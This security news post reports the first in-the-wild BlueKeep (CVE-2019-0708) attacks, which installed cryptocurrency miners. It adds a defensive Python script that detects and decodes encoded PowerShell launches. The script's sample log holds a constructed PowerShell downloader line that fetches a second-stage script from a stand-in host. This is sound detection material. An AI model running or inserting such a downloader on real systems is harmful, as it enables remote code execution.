Delaware, USA – November 4, 2019 – Security researchers have for the first time discovered the BlueKeep vulnerability being exploited for malicious purposes. So far the attackers, who are not particularly skilled, are using the exploit module published several months ago by the Metasploit team to infect unpatched Windows systems with Monero cryptocurrency miners. The campaign began in the second half of October but remained undetected for a couple of weeks. Kevin Beaumont discovered the attacks while checking the logs of his honeypots and shared his findings with the cybersecurity community. Marcus Hutchins analyzed the crash dump provided by Kevin and found not only the use of the Metasploit module but also the encrypted PowerShell command used to deliver the final payload – a known cryptocurrency miner. The malware has no worm-like capabilities, so the attackers scan the Internet for vulnerable systems themselves and then upload the list of IPs to a server for further infection.
The detected campaign does not pose a particular threat, but even so its detection took two weeks. More skilled cybercriminals may well have been exploiting this vulnerability for a long time while staying under the radar of security researchers: the first scans for vulnerable systems began back in late May, and in the summer it became known that information about the vulnerability was being actively shared on Chinese hacker forums in order to create a working exploit.
You can read the detailed blog post to learn more about creating proactive content that detects attempts to exploit the BlueKeep flaw: https://socprime.com/en/blog/proactive-detection-content-cve-2019-0708-vs-attck-sigma-elastic-and-arcsight/
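The campaign described above was recognisable from the encoded PowerShell command that fetched the miner once the Metasploit module had landed. The script below is an added example, not code from the original post or from SOC Prime's rule packs: it walks Sysmon-style process-creation events in a constructed flat Key=Value log format (an assumption; real Sysmon events are XML or JSON), picks out PowerShell launches that carry an -EncodedCommand style argument, and decodes the base64/UTF-16LE payload so an analyst can see what the launcher was about to run. The host names, paths, sample script text and the "example.invalid" URL are all constructed.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so the short
# forms seen in the wild (-enc, -ec, -e) are matched as well. The argument is
# base64 of the script text encoded as UTF-16LE.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|encodedc|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# Constructed log format: Key=value or Key="value with spaces".
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    host: str
    parent_image: str
    decoded_script: str


def decode_encoded_command(token: str) -> Optional[str]:
    """Return the script text behind an -EncodedCommand token, or None if the
    token is not valid base64 / UTF-16LE (a mangled or truncated log line)."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def parse_fields(line: str) -> Dict[str, str]:
    """Parse one line of the constructed flat log format into a dict."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}


def scan_log(lines: List[str]) -> List[Finding]:
    """Flag process-creation events where PowerShell was started with an
    encoded command, returning the decoded script for triage."""
    findings: List[Finding] = []
    for line in lines:
        fields = parse_fields(line)
        if fields.get("EventID") != "1":  # Sysmon event 1 = process creation
            continue
        image = fields.get("Image", "").lower()
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            continue
        match = ENCODED_FLAG.search(fields.get("CommandLine", ""))
        if not match:
            continue
        script = decode_encoded_command(match.group(1))
        if script is None:
            continue
        findings.append(Finding(fields.get("Host", "?"),
                                fields.get("ParentImage", "?"), script))
    return findings


# Constructed sample data: a benign-looking downloader stub, encoded the way
# PowerShell expects, embedded in one of three constructed process events.
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_TOKEN = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    'EventID=1 Host=ws01 Image="C:\\Windows\\System32\\notepad.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="notepad.exe"',
    'EventID=1 Host=ws01 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="powershell.exe -NoProfile Get-Process"',
    'EventID=1 Host=ws02 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\System32\\svchost.exe" '
    'CommandLine="powershell.exe -nop -w hidden -enc ' + SAMPLE_TOKEN + '"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding.host}: PowerShell spawned by {finding.parent_image}")
        print(f"  decoded: {finding.decoded_script}")
```

Only the third constructed event is reported: plain PowerShell use and non-PowerShell processes are ignored, and a token that fails to decode is dropped rather than raising, so a damaged line cannot stop the scan. In practice the parent image is the second signal worth keeping in the alert, since the same decoded script is far more interesting when the launcher's parent is not a user shell.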
Links to free detection content
Sigma by Markus Neis – https://github.com/Neo23x0/sigma/blob/master/rules/windows/sysmon/sysmon_susp_rdp.yml
Sigma by Roman Ranskyi – https://tdm.socprime.com/tdm/info/PqEM7DhU0qKB/
Rule pack for Elastic stack, ArcSight, and QRadar – https://tdm.socprime.com/tdm/info/08aL8Ao2P8pk/
Potential RDP exploit CVE-2019-0708 – https://tdm.socprime.com/tdm/info/ukDoTj7K7ZUr/
Scanner PoC for CVE-2019-0708 RDP RCE vuln – https://tdm.socprime.com/tdm/info/dxSqHBcCVylk/